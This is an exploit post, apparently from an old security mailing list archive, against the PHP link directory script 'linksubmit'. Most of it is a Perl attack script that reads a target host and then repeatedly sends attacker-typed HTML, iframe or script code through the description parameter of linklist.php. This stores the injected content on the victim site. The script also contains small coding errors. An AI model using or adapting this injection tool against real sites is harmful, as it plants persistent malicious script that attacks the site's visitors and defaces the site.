linksubmit <= All version Html Tag Injector in index.php



Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)

Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
######################################################
# Name : linksubmit #
# Site : http://www.phpselect.com/ #
######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;


print "-------------------------------------------\n";
print "= Iran hacekerz security team =\n";
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";


print "Target >http://";;
chomp($targ = <STDIN>);
print "your web site name >";
chomp($wwwname= <STDIN>);
print "your web site url >";
chomp($wsurl= <STDIN>);
print "your email >";
chomp($mail= <STDIN>);

$con=get("http://".$targ."/linklist.php";) || die "[-]Cannot connect to Host";
while ()
{
print "Html code\$";
chomp($comd=<STDIN>);
$commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)
}



Relevant Pages

  • Multiple Cross-Site Scripting (XSS) in glFusion
    ... Vendor Notification: January 30, 2013 ... function go2() ...
    (Bugtraq)
  • HTML Development and Delivery Issue
    ... In a project the annotations document for a Web project has been developed internally. ... Joe sees a plethora of HTML issues that need to be resolved by the vendor ASAP. ... There is no source code control for the HTML pages in either Joe's shop or at the vendor. ... Joe asks the vendor to incorporate the previously developed HTML snippets into the new baseline. ...
    (alt.html)
  • Re: SD Times article
    ... HTML sure would've gone far! ... It should be changed by an open standards body, ... vendor. ... Lauchlan M ...
    (borland.public.delphi.non-technical)
  • Re: HTML Programming Book
    ... permitted with HTML 4.01 Transitional / loose.dtd. ... If you are referring to the FRAMESET element, you are wrong; ... Target may also be used to specify e.g. a new browser window (or, ...
    (comp.infosystems.www.authoring.html)
  • Re: FAQ Topic - How do I POST a form to a new window? (2011-01-03)
    ... DTD) declaring the Transitional variant of HTML 4.01 and XHTML 1.0 ... HTML* requires that. ... target works in just the usual manner, ...
    (comp.lang.javascript)